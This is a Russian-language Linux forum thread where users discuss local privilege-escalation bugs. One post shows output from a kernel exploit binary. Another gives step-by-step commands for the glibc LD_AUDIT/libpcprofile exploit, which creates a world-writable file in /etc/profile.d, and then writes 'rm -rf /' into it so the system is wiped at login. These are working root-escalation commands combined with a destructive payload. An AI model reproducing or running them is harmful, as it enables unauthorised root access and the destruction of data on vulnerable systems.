Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
Форум MaemoWorld.ru → Linux и другие UNIX-подобные ОС → Эпичное
Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Кажется это вот это http://unixforum.org/index.php?showtopic=117484
Уязвимость была исправлена ещё давно, патчи внесены в ядро, но потом кто-то откатил эти изменения.
Проверил, эпично. Перезагрузился (обновление ядра вчера установил, не перезагружал).
И:
deam@notebook:~$ ./boom
resolved symbol commit_creds to 0xffffffff8108bdb0
resolved symbol prepare_kernel_cred to 0xffffffff8108c190
mapping at 3f80000000
UID 1000, EUID:1000 GID:1000, EGID:1000
$ apt-get update
E: Не удалось открыть файл блокировки /var/lib/apt/lists/lock - open (13: Отказано в доступе)
E: Невозможно заблокировать каталог со списками пакетов
Кажется не менее былинное продолжение истории: http://unixforum.org/index.php?showtopic=117674
MrClon, это называется ССЗБ (Сами Себе Злобные Бакланы).
Раз компилишь - смотри, что компилишь.
Такие вещи на виртуалке надо компилировать
MrClon, название троянистое, я даже до него не дошёл, robert_you_suck.c глянул и компильнул только. Код там короткий и достаточно наглядный, да и без блобов.
А теперь про glibc. Уязвимость даёт возможность локальному пользователю повысить права до root'а и просто набезобразничать.
Подробности есть на opennet.ru и linux.org.ru.
Дней пять назад шум поднялся, но варианты использования уязвимости были так себе.
В общем, вот работающий вариант использования уязвимости:
$ umask 0
Имея возможность создания лог-файла в любом каталоге системы, почему бы не использовать /etc/profile.d/
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/profile.d/boo.sh" ping
На вывод ошибок не обращаем внимания, ибо /etc/profile.d/boo.sh уже создан
$ ls -l /etc/profile.d/boo.sh
-rw-rw-rw- 1 root root 4 Окт 23 19:20 /etc/profile.d/boo.sh
Осталось только наполнить его нужным кодом
$ printf "rm -rf /" > /etc/profile.d/boo.sh
Ну, а когда этот вредный код выполнится, вы поймёте сами.
Насколько мне известно пофиксили в дебиане и убунте, изначально не работала на alt linux.
Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Форум MaemoWorld.ru → Linux и другие UNIX-подобные ОС → Эпичное
Форум работает на PunBB, при поддержке Informer Technologies, Inc
Currently installed 6 official extensions. Copyright © 2003–2009 PunBB.
Сгенерировано за 0.061 секунды (93% PHP — 7% БД) 12 запросов к базе данных